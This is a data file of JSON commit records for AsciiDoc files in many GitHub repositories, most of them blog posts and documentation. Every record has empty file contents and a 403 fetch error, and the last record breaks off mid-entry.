{"commit":"4ead10dbd267380c7b6ee4dec3ab903a1d60a188","subject":"Document IGNORE_EXTENSIONS = GIT","message":"Document IGNORE_EXTENSIONS = GIT\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c22293b6478328618fb89e220668d4921137a9a","subject":"Update 2016-03-01-Hub-Press.adoc","message":"Update 2016-03-01-Hub-Press.adoc","repos":"buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io","old_file":"_posts\/2016-03-01-Hub-Press.adoc","new_file":"_posts\/2016-03-01-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buliaoyin\/buliaoyin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdc668971b58f6dbc0c6870729d1c8dbfce3b90","subject":"Update 2016-10-08-Drools-60.adoc","message":"Update 2016-10-08-Drools-60.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-10-08-Drools-60.adoc","new_file":"_posts\/2016-10-08-Drools-60.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cedfb971ce14439ab9eeb54c997b8983086a31","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa98e8aa0bf6f20e3a12a4f368cfdabe6ccf627","subject":"initial commit of the tools dir","message":"initial commit of the tools dir\n","repos":"ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan,ProgrammingRobotsStudyGroup\/robo_magellan","old_file":"tools\/readme.adoc","new_file":"tools\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/robo_magellan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afc39f7516e27143bb1719ee3be83abd337e031b","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe45faf3dbde5b9100aa0f2e375172d8b4b20d0","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdcafcb7257eeb478c778773065739234102d9eb","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/jenkins-scripts","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/jenkins-scripts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1a0545bf5dabc14d59a050d7ebc1810a026fd2f","subject":"Create TechnologyStacks.adoc","message":"Create TechnologyStacks.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"TechnologyStacks.adoc","new_file":"TechnologyStacks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"493191f47c85ab14955fe3c4e4fd7c2612030506","subject":"y2b create post Galaxy Note 4 Bend Test","message":"y2b create post Galaxy Note 4 Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-08-Galaxy-Note-4-Bend-Test.adoc","new_file":"_posts\/2014-10-08-Galaxy-Note-4-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742520f9f3cf491bd0c09625a4b2dbd54bebfc31","subject":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","message":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20dcdc8522bea87510b3815478c31d3b37827e46","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ce1891f98360046214fc14db599caf56331c123","subject":"Add contribution guide","message":"Add contribution guide","repos":"oskopek\/irsee.net,oskopek\/irsee.net","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/irsee.net.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b3f385cf99f4c0f7f09136b96ed9af926f490f","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16dc124f073e4dc29e4c60703b18138af4d3f16c","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4ea8e453f65f69d6174206081cc139fb70830ce","subject":"Clarif time","message":"Clarif time\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23dcc48cdc7a7f81cba8cd08308a9e339f3ff36f","subject":"Update 2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","message":"Update 2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","new_file":"_posts\/2016-03-04-New-Frozen-musical-opening-in-Disney-California-Adventure-May-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c5f7d92d02f5d8dbdd7016a006aa0f942816e13","subject":"Update 2015-05-03-New-blog.adoc","message":"Update 2015-05-03-New-blog.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2015-05-03-New-blog.adoc","new_file":"_posts\/2015-05-03-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45e00a79558330c1f218d5d01691a34725419bdc","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea5614446183adfa615134924a4f53e353e0fb3","subject":"Preliminary draft of Consensus Hashing proposal.","message":"Preliminary draft of Consensus Hashing proposal.\n","repos":"dexX7\/bitcoin-spock,dexX7\/bitcoin-spock,OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/msc-consensus-hashing.adoc","new_file":"adoc\/msc-consensus-hashing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"345562d059afb7cde4f546acd0d4f4cd74e770ec","subject":"fix typo 'Multi-theading'","message":"fix typo 'Multi-theading'\n","repos":"openlimit-signcubes\/dss,esig\/dss,openlimit-signcubes\/dss,esig\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openlimit-signcubes\/dss.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"daf929caa8e93ee43675cdb637b118a6cbd4e94c","subject":"Added artifact yaml style guide","message":"Added artifact yaml style guide\n","repos":"google\/grr-doc","old_file":"artifact_yaml_style.adoc","new_file":"artifact_yaml_style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e31bb17719536d90f3a30f01d5788bd35228de63","subject":"CL: notes on using open and close","message":"CL: notes on using open and close\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9ed38922f56ba735d97144db69f6fae3520a84c3","subject":"y2b create post iPad Air Giveaway!","message":"y2b create post iPad Air Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-11-iPad-Air-Giveaway.adoc","new_file":"_posts\/2013-11-11-iPad-Air-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"960db2e9568c0fc43ad0bc7076ba6a0bfaf74abe","subject":"Update 2018-03-08-Thinking.adoc","message":"Update 2018-03-08-Thinking.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-08-Thinking.adoc","new_file":"_posts\/2018-03-08-Thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443aa40d312fb030d0d14e8e17f61d65e5d0aee0","subject":"Add a man page for daniel-pass.","message":"Add a man page for daniel-pass.\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-pass.adoc","new_file":"doc\/daniel-pass.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b22ca45e138dc6d7f3c117c999333df37c20d5a","subject":"BXMSDOC-2127: Modularizing and updating chap-planner-introduction.adoc file for DM 7.0","message":"BXMSDOC-2127: Modularizing and updating chap-planner-introduction.adoc file for DM 7.0\n","repos":"jomarko\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-maven-configuration-proc.adoc","new_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-maven-configuration-proc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"031ffc35137458da169f47d61307c39b70ed5034","subject":"Initial revision\/import. (#481)","message":"Initial revision\/import. (#481)\n\n","repos":"nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip","old_file":"docs\/specs\/chip-tlv-format.adoc","new_file":"docs\/specs\/chip-tlv-format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/project-chip\/connectedhomeip.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"533fdb4a7b797cc99661f61ff1b9c45cd6e25d6c","subject":"Update 2015-02-18-Work-standing-up-and-meditation.adoc","message":"Update 2015-02-18-Work-standing-up-and-meditation.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-18-Work-standing-up-and-meditation.adoc","new_file":"_posts\/2015-02-18-Work-standing-up-and-meditation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86de2ab0ba2f247f55cc699b5f9e1482eaf34c80","subject":"knowledge note","message":"knowledge note\n","repos":"jarodsun\/note_everything","old_file":"notes.adoc","new_file":"notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarodsun\/note_everything.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"6bdf9dbf6910ae943ca1f12f787c61396a7666e2","subject":"I prefer asciidoc","message":"I prefer asciidoc\n","repos":"vdmeer\/skb-java-examples,vdmeer\/skb-java-examples,vdmeer\/skb-java-examples,vdmeer\/skb-java-examples","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vdmeer\/skb-java-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70afe95342d2fbef88d542396923858446e6f534","subject":"Configuration for the tensorics repo.","message":"Configuration for the tensorics repo.\n\nIt should start working as soon as we add travis and Coveralls.\nConflicts:\n\tREADME.asciidoc\n\n\ngit-svn-id: 931ef96727c1945c41eec76d1319aea4c3c125f4@11178 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f41e4b11bc4f91ed341b253a891d95afc12f22b6","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00e3b7a672ed10695b247cea5e691be735c8a3cb","subject":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9581365eca52e1e1036aba635e8671f78b4e21a2","subject":"Add news\/2016-10-03-forge-3.3.2.final.asciidoc","message":"Add news\/2016-10-03-forge-3.3.2.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-10-03-forge-3.3.2.final.asciidoc","new_file":"news\/2016-10-03-forge-3.3.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"241c05fed67f8d86da01fd52e87e81ba528a8999","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40569967ecc7fe2506d34fdb14f730b54d336745","subject":"y2b create post You've Never Seen Headphones Like This...","message":"y2b create post You've Never Seen Headphones Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-12-Youve-Never-Seen-Headphones-Like-This.adoc","new_file":"_posts\/2017-05-12-Youve-Never-Seen-Headphones-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e618d0b2835737a38b40eedeb65ee53ad59ed4c2","subject":"Update 2016-04-06-FW4SPL-branches-status.adoc","message":"Update 2016-04-06-FW4SPL-branches-status.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-04-06-FW4SPL-branches-status.adoc","new_file":"_posts\/2016-04-06-FW4SPL-branches-status.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc7dc36636a7f842e7277eadb3c2002c6487dc9","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cbf86b406400b6b6369910d2989d3a44c36500c","subject":"Update 2015-07-31-a-3rd-test.adoc","message":"Update 2015-07-31-a-3rd-test.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-31-a-3rd-test.adoc","new_file":"_posts\/2015-07-31-a-3rd-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4103ee72c9b4970e9ea0f4e0db5535dbba8ca37","subject":"Update 2017-06-03-El-placer-del-sueno.adoc","message":"Update 2017-06-03-El-placer-del-sueno.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-03-El-placer-del-sueno.adoc","new_file":"_posts\/2017-06-03-El-placer-del-sueno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77aa58e5d73b78ed200e6ce7eadf14bb31a07823","subject":"sectanchors","message":"sectanchors","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bccc3a12324f218c567047b65d9ee374db081e2","subject":"Publish 2016-7-2-Life.adoc","message":"Publish 2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-Life.adoc","new_file":"2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1ba8400c30dac0253d08e911120e31c1c853fd9","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df1cfba44981a32cec24f2e9ee7cfc6aa3b95feb","subject":"ClojureX conference 2018 (#257)","message":"ClojureX conference 2018 (#257)\n\nDescription of the ClojureX conference in London in December 2018","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojurex.adoc","new_file":"content\/events\/2018\/clojurex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5dfd697831b465fa6d7eab4660441a1b231c8909","subject":"y2b create post THEY SHRUNK MY STUFF!","message":"y2b create post THEY SHRUNK MY STUFF!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-07-THEY-SHRUNK-MY-STUFF.adoc","new_file":"_posts\/2015-12-07-THEY-SHRUNK-MY-STUFF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805807894a2b40027a1b634d46f7c8ad293f1101","subject":"Update 2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","message":"Update 2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","new_file":"_posts\/2016-08-19-Double-Blogging-on-the-Triple-Frontier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5b2a2020141bc50a9d8f53ab1922f4f6abb2b5","subject":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","message":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8fedcdf1f2a1c98abd6b4bb8b1d3e81956d2141","subject":"Released v0.7.0 and updated README","message":"Released v0.7.0 and updated README\n","repos":"RobWin\/circuitbreaker-java8,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90ec3eaf33338502b3d4f6c6b8f7228a47dd849b","subject":"Add README with basic 